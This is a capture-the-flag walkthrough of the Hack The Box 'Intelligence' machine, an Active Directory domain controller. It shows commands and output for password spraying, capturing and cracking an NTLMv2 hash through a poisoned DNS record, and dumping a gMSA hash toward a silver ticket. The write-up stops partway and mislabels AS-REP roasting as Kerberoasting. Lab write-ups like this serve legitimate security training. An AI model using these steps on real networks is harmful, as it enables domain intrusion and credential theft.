# Nmap 7.92 scan initiated Thu Sep 23 15:19:45 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.35s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-23 16:05:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h15m00s, deviation: 0s, median: 7h15m00s
| smb2-time:
| date: 2021-09-23T16:06:11
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 23 15:21:50 2021 -- 1 IP address (1 host up) scanned in 125.17 seconds
Nmap show a lot of services running on the machine, LDAP , Kerberos, HTTP, SMB and others. We also have hostname and virtual host in the nmap output. Add them to /etc/hosts file.
Web Enumeration
There are two pdf to download. Inside both files are not interesting but if we lookup meta data of the two file, we can see creator name.
Save in a file and let's check these two user are valid or not.
Both accounts are valid. Now try to query the domain for users with Do not require Kerberos pre-authentication set and export their TGTs for cracking.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py intelligence.htb/ -usersfile users
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jose.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
Both accounts have not set to Do not require pre-auth. This mean, we can't perform Kerberoasting attack, it requires a user with Pre-Authentication enabled.
Now look at the name of PDF files, we can see a pattern. 2020-01-01-upload.pdf
It's just a date and we can generate list of dates and bruteforce for other pdf files.
All 30 accounts are valid.I checked which account is set Do not require Kerberos pre-authentication but unfortunately even one account is not set.
Enumerating in PDF
When I grep some password in pdf, I see this.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ pdfgrep "pass" *.pdf
2020-06-04-upload.pdf:Please login using your username and the default password of:
2020-06-04-upload.pdf:After logging in please change your password as soon as possible.
In another pdf, I also found this
It tell us about a script which is placed by Ted user. They are in the process of locking down in service accounts.
Now we have the password and multiple user. We should try to perform Password Spraying attack on all users with the new password we got.
We got one user valid with that password and we can also access shared folder of that user.
smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Mon Apr 19 07:50:26 2021
.. DR 0 Mon Apr 19 07:50:26 2021
Administrator D 0 Mon Apr 19 06:48:39 2021
All Users DHSrn 0 Sat Sep 15 13:51:46 2018
Default DHR 0 Mon Apr 19 08:47:40 2021
Default User DHSrn 0 Sat Sep 15 13:51:46 2018
desktop.ini AHS 174 Sat Sep 15 13:41:27 2018
Public DR 0 Mon Apr 19 06:48:39 2021
Ted.Graves D 0 Mon Apr 19 07:50:26 2021
Tiffany.Molina D 0 Mon Apr 19 07:21:46 2021
3770367 blocks of size 4096. 1390125 blocks available
smb: \>
In Tiffany’s directory we can find the user flag.
smb: \Tiffany.Molina\Desktop\> more user.txt
cc107e8830f*********f6f1e4795d69a6b
Privilege Escalation
In IT share folder
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ smbclient \\\\intelligence.htb\\IT -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 19 07:20:55 2021
.. D 0 Mon Apr 19 07:20:55 2021
downdetector.ps1 A 1046 Mon Apr 19 07:20:55 2021
get
3770367 blocks of size 4096. 1390093 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>
We will get a powershell file
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
It look like kind of cronjob running every 5min. It check for DNS records locally and if any of these records start with web then it will request the DNS record via HTTP request using current user’s credentials (probably Ted). If the response code is not 200 (OK) then it will send an email to Ted user mentioning that the host (DNS) is down.
If we map a DNS record to our own host (IP) and when the HTTP request is made to check the status of the DNS then we will receive a request (because our IP is mapped with that DNS) and in turn then we can send NTLM authentication request back to the IP address.So if we can add a dns in the record we can get the Ted.Graves hash using responder.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/krbrelayx]
└──╼ [??]$ john hash --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:09 DONE (2021-11-27 18:29) 0.1075g/s 1162Kp/s 1162Kc/s 1162KC/s Mrz.deltasigma..Morgant1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
We got the password of Ted user. Now we can try the gMSADumper to read the password of svc_int (service account).
└──╼ [??]$ python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::b98d4cef68f72a98dfeed732d1b1abca
Now we have the hash, I tried to crack to get the password but unfortunately I didn't get anything.
Getting Silver Ticket
Let’s use pass the hash technique to impersonate administrator and get the silver ticket. To generate silver ticket we need one more thing, that is SPN (Service Principle Name).
SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.
We will use bloodhound tool to dump AD environment to find the SPN.
┌─[sheinn101@parrot]─[/opt/BloodHound.py]
└──╼ [??]$ python3 bloodhound.py -u Ted.Graves -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c All
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The DNS query name does not exist: svc_int.intelligence.htb.
INFO: Done in 01M 24S
It dump all the information in json format. We are looking for SPN, it should have in computers.json file.
